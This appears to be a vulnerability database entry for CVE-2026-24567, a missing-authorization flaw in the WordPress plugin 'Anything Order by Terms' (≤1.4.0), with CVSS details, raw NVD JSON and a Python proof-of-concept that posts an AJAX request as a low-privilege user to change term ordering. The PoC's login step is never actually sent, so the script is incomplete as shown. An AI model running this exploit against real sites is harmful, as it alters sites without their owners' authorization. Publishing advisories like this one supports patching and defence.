Security Vulnerability Report
中文
CVE-2026-24567 CVSS 4.3 MEDIUM

CVE-2026-24567

Published: 2026-01-23 15:16:14
Last Modified: 2026-04-28 15:16:15

Description

Missing Authorization vulnerability in briarinc Anything Order by Terms anything-order-by-terms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Anything Order by Terms: from n/a through <= 1.4.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Anything Order by Terms <= 1.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24567 PoC - Broken Access Control in Anything Order by Terms # This PoC demonstrates exploitation of missing authorization vulnerability # The plugin fails to properly verify user capabilities before updating term order import requests import sys TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php" WP_URL = "https://vulnerable-site.com" def exploit_cve_2026_24567(): """ Exploit missing authorization in Anything Order by Terms plugin (<=1.4.0) This allows low-privilege users to modify term ordering without proper capability checks """ # Authentication with low-privilege user (subscriber role) session = requests.Session() # Step 1: Login as low-privilege user login_data = { 'log': 'low_privilege_user', 'pwd': 'user_password', 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } # Note: In real attack, obtain valid low-privilege credentials print("[*] Note: This PoC requires valid low-privilege WordPress credentials") print("[*] The vulnerability allows unauthorized term order modifications") # Step 2: Craft malicious request to modify term order exploit_data = { 'action': 'anything_order_by_terms_update_order', 'term_id': '1', 'order': '999', 'taxonomy': 'category' } # Step 3: Send exploit request # The plugin should verify current_user_can('manage_categories') but doesn't response = session.post(TARGET_URL, data=exploit_data, verify=False) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text}") if response.status_code == 200 and 'success' in response.text: print("[+] Exploitation successful - term order modified without proper authorization") else: print("[-] Exploitation may have failed or target is patched") if __name__ == "__main__": exploit_cve_2026_24567()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24567", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:14.410", "lastModified": "2026-04-28T15:16:15.090", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in briarinc Anything Order by Terms anything-order-by-terms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Anything Order by Terms: from n/a through <= 1.4.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en briarinc Anything Order por Terms anything-order-by-terms permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Anything Order por Terms: desde n/a hasta &lt;= 1.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/anything-order-by-terms/vulnerability/wordpress-anything-order-by-terms-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}